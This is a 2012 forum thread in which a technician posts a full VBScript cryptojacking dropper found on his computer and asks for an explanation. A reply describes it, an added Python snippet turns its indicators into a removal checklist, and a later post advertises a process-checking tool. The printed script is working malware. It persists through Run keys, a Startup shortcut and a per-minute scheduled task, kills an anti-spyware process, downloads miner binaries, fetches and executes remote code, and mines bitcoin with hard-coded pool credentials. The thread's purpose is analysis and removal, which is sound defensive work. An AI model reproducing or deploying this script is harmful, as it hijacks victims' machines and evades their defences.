-
Sep 30th, 2012, 02:35 AM
#1
Thread Starter
New Member
Suspicious vbs - could someone translate?
As of this morning, each time I start my computer I am prompted to run a vbs called "winlogin" . . . it seems to be an attempt on someone's behalf to use my computer's processing power to make money through something called "bitcoin". I'm a technician (have been for 17 years) and I will eventually remove the script, but while it's still on the computer (though inactive) I am wondering if anyone could tell me what exactly it is trying to achieve and how - I'm very curious about what exactly the script means - I am not a programmer - I have been able to get the gist of it by looking at the code, but am unsure about the finer details. If you're so inclined, could you have a look and tell me what this vbs is hoping to do and how it hopes to do it. Thanks!
Here's the code:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
'0.5.2
sub dl(strFileURL, strHDLocation)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then
objFSO.DeleteFile strHDLocation
end if
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
end sub
sub dlEval(strFileURL)
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Execute(objXMLHTTP.ResponseText)
if (objXMLHTTP.ResponseText = "call Uninstall()") then
wscript.quit
end if
Set objXMLHTTP = Nothing
End if
end sub
sub ex(path)
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create path, null, objConfig, intProcessID
end sub
function countProcess(name)
set service = GetObject ("winmgmts:")
counter = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = name then
counter = counter+1
End If
next
countProcess = counter
end Function
Function checkIfRunning(quit)
counter = countProcess("wscript.exe")
if counter > 1 then
checkIfRunning = true
if (quit = true) then
wscript.quit
end if
exit function
end if
checkIfRunning = false
end function
Function getEnv(variableName)
Set wshShell = CreateObject( "WScript.Shell" )
result = wshShell.ExpandEnvironmentStrings( "%" & variableName & "%" )
if (result <> "%" & variableName & "%") then
getEnv = result
exit Function
end if
getEnv = false
end Function
function findTmpDir()
tmp = getEnv("TEMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
tmp = getEnv("TMP")
if (tmp <> false) then
findTmpDir = tmp
exit Function
end if
findTmpDir = false
end Function
sub verifyRegistryKey(key, val)
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.RegWrite key, val, "REG_SZ"
Set oShell = Nothing
end sub
function getAutostartPath()
Set oShell = WScript.CreateObject("WScript.Shell")
path = oShell.SpecialFolders("Startup")
Set oShell = Nothing
path=path & "\Windows Login Script.lnk"
getAutostartPath = path
end function
sub verifyAutostart(path)
aPath = getAutostartPath()
if (aPath <> false) then
Set oShell = WScript.CreateObject("WScript.Shell")
set lnk = oShell.CreateShortcut(aPath)
lnk.TargetPath = path
lnk.save
set oShell = Nothing
end if
end sub
function getTmpPath()
tmp = findTmpDir()
if (tmp <> false) then
tmp = tmp & "\winlogin.vbs"
end if
getTmpPath = tmp
end function
function getUserProfilePath()
up = getEnv("USERPROFILE")
if (up <> false) then
up = up & "\winlogin.vbs"
end if
getUserProfilePath = up
end function
sub copySelf
Set oFSO = CreateObject("Scripting.FileSystemObject")
tmp = getTmpPath
if (tmp <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, tmp, true)
end if
up = getUserProfilePath()
if (up <> false) then
call oFSO.copyFile(Wscript.ScriptFullName, up, true)
end if
set oFSO = Nothing
end sub
sub Uninstall()
'FIXME: [Future] Uninstall procedure
end sub
sub Update()
'FIXME: [Future] Update procedure
end sub
Function tryToKillProcess(name)
set objWMIService = GETOBJECT("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set colProcess = objWMIService.ExecQuery("Select * from Win32_Process Where Name = '" & name & "'")
count = 0
for each objProcess in colProcess
objProcess.Terminate()
count = count + 1
next
tryToKillProcess = count
end Function
sub addScheduledTask()
cmd = getUserProfilePath()
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colOperatingSystem = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystem
ServicePack = objOperatingSystem.ServicePackMajorVersion
Version = objOperatingSystem.Version
Next
IF Mid(Version,1,3) = "5.1" Then
xp = true
else
xp = false
end if
if (fileExists("schtasks.exe") = true and xp = false) then
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
else
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colScheduledJobs = objWMIService.ExecQuery("Select * from Win32_ScheduledJob")
Needed = true
For Each objJob in colScheduledJobs
if InStr(LCase(objJob.Command), "winlogin.vbs") then
Needed = false
end if
next
if Needed = true then
Set objNewJob = objWMIService.Get("Win32_ScheduledJob")
for i=0 to 23
if (len(i) < 2) then
strTime = "********0" & i & "1000.000000-000"
else
strTime = "********" & i & "1000.000000-000"
end if
errJobCreated = objNewJob.Create ("wscript.exe """ & cmd & """", strTime, True , 127, , , JobID)
next
end if
end if
end sub
sub infect()
call copySelf
skipRegistryInfection = false
if (countProcess("TeaTimer.exe") > 0) then
tryToKillProcess("TeaTimer.exe")
if (countProcess("TeaTimer.exe") > 0) then
skipRegistryInfection = true
end if
end if
if (skipRegistryInfection = false) then
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
Err.Clear()
On Error Resume Next
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
if (Err.Number <> 0) then
admin = false
else
admin = true
end if
'FIXME: [Future] for USB spreading
'call verifyRegistryKey("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutorun", 0)
end if
call verifyAutoStart(getUserProfilePath())
call addScheduledTask()
end sub
Function getMinerPath(miner)
tmp = findTmpDir()
getMinerPath = false
if (tmp <> false) then
Select case miner
Case "gpu"
minerName = "\cgm\msdc.exe"
Case "cpu"
minerName = "\rpcm\svehost.exe"
end select
getMinerPath = tmp & minerName
end if
end Function
function fileExists(theDLL)
sysPath = getEnv("PATH")
arSysPath = Split(sysPath, ";")
Set objFSO = Createobject("Scripting.FileSystemObject")
fileExists = false
for each path in arSysPath
If objFSO.Fileexists(path & "\" & theDLL) Then
fileExists = true
exit for
end if
next
Set objFSO = Nothing
End Function
sub getRequiredPackages()
cgm = getMinerPath("gpu")
rpcm = getMinerPath("cpu")
if (cgm <> false and rpcm <> false) then
Set objFSO = Createobject("Scripting.FileSystemObject")
needed = false
If not objFSO.Fileexists(cgm) or not objFSO.Fileexists(rpcm) Then
needed = true
end if
if (needed = true) then
tmp = findTmpDir()
tmpPath = tmp & "\arc.exe"
'FIXME: CHANGE ADDRESS!
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call ex(tmpPath & " x -o" & tmp & " -y")
end if
end if
end sub
Function verifyPayloadRunning()
verifyPayloadRunning = false
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
if (cgCount + rpcCount > 0) then
verifyPayloadRunning = true
end if
end Function
sub startGPUMining()
cgm = getMinerPath("gpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & cgm & " -o api.bitcoin.cz:8332 -O hallmining.worker1:7d9LwsMG --no-pool-disable -I -2")
end sub
sub startCPUMining()
threads = getEnv("NUMBER_OF_PROCESSORS")
if threads = false then
threads = 1
else
if (threads > 1) then
threads = int(threads/2)
end if
end if
rpcm = getMinerPath("cpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & rpcm & " -url=http://api.bitcoin.cz:8332 -threads=" & threads & " -user=hallmining.worker1 -password=7d9LwsMG")
end sub
sub payload()
running = verifyPayloadRunning()
if (running = false) then
call getRequiredPackages()
tmp = findTmpDir()
if (tmp <> false) then
if (fileExists("openCL.dll") = true) then
call startGPUMining()
wscript.sleep(10000)
if (verifyPayloadRunning() = false) then
call startCPUMining()
end if
else
call startCPUMining()
end if
end if
end if
end sub
'TODO: scramble code
On Error Resume Next
call infect()
call checkIfRunning(true)
'FIXME: CHANGE ADDRESS!
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
call payload()
-
Sep 30th, 2012, 10:13 AM
#2
Re: Suspicious vbs - could someone translate?
In short, to me it looks like the script is trying to create/overwrite winlogin.vbs with code to download and execute a script from "https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" This is then run at startup and as a scheduled task. I see nothing good in the code you posted.
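The script above hard-codes every place it touches: two Run keys and a Startup shortcut, a scheduled task, copies of itself under %TEMP% and %USERPROFILE%, two miner binaries, and the Dropbox URLs it fetches. The following is an added example (not part of the thread) that pulls those indicators out of the posted VBS text with regular expressions and turns them into a removal checklist; the sample input is an excerpt of the script reproduced from the post, and the pattern names are this example's own. Because dlEval() executes whatever test.txt returns, the static list is a lower bound on what the script can do.

```python
import re

# Excerpt of the winlogin.vbs posted above, used as constructed sample input:
# only the lines that carry indicators are reproduced here.
SAMPLE_VBS = r'''
call verifyRegistryKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
call verifyRegistryKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Login Script", getTmpPath())
path=path & "\Windows Login Script.lnk"
call ex("schtasks.exe /Create /TN ""Windows Login Script"" /TR """ & cmd & """ /SC MINUTE /MO 1 /F")
tmp = tmp & "\winlogin.vbs"
minerName = "\cgm\msdc.exe"
minerName = "\rpcm\svehost.exe"
call dl("https://dl.dropbox.com/s/fq36kr9xoegj8a3/arc.exe?dl=1", tmpPath)
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
cgCount = countProcess("msdc.exe")
rpcCount = countProcess("svehost.exe") + countProcess("wmisrv.exe")
'''

# Each pattern targets one of the script's own helper calls or string literals
# (pattern names are chosen for this example).
PATTERNS = {
    "urls":          re.compile(r'"(https?://[^"]+)"'),
    "run_keys":      re.compile(r'verifyRegistryKey\("([^"]+)"'),
    "dropped_files": re.compile(r'"(\\[^"]*\.(?:vbs|exe|lnk))"'),
    "processes":     re.compile(r'countProcess\("([^"]+)"\)'),
    "task_names":    re.compile(r'/TN ""([^"]+)""'),
}


def extract_iocs(vbs_text):
    """Return sorted, de-duplicated indicators found in the script text."""
    return {name: sorted(set(rx.findall(vbs_text))) for name, rx in PATTERNS.items()}


def removal_checklist(iocs):
    """Turn the indicators into the places a technician has to inspect."""
    steps = [f"registry value: {k}" for k in iocs["run_keys"]]
    steps += [f"scheduled task / Startup shortcut named: {t}" for t in iocs["task_names"]]
    steps += [f"file under %TEMP% or %USERPROFILE%: {f}" for f in iocs["dropped_files"]]
    steps += [f"running process: {p}" for p in iocs["processes"]]
    steps += [f"outbound request to: {u}" for u in iocs["urls"]]
    return steps


if __name__ == "__main__":
    for step in removal_checklist(extract_iocs(SAMPLE_VBS)):
        print(step)
```

Run it against the full script text instead of the excerpt to get the same checklist; the miner binaries are deleted by their path under %TEMP%, and the schtasks entry re-launches the script every minute until the task itself is removed.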
-
Sep 30th, 2012, 11:59 AM
#3
Thread Starter
New Member
Re: Suspicious vbs - could someone translate?
Thanks Mark . . . as a tech, sometimes I wish I knew more about programming, it would be helpful in certain situations. I was able to get the general sense of what this person is trying to accomplish, but I didn't notice that it was set to run as a task. Very helpful! Thank you : )
-
Oct 3rd, 2012, 08:58 AM
#4
Lively Member
Re: Suspicious vbs - could someone translate?
I am trying to develop an HTA application, "Process Checker.hta", to check the various processes running on a PC online against Fichier.net, ProcessLibrary and Google.
So the purpose of this application is to check whether a process is malware or a normal process that belongs to the system.
You can display the executable file associated with the process in Explorer,
and you can also kill the process, or even all instances of it.
This program was tested on Windows XP SP2; it is in beta and under development, so if you encounter any bug on Windows 7 or Vista, please don't blame me.
NB: it's a French version, and if some volunteer members here would like to translate it into English, that would be nicer.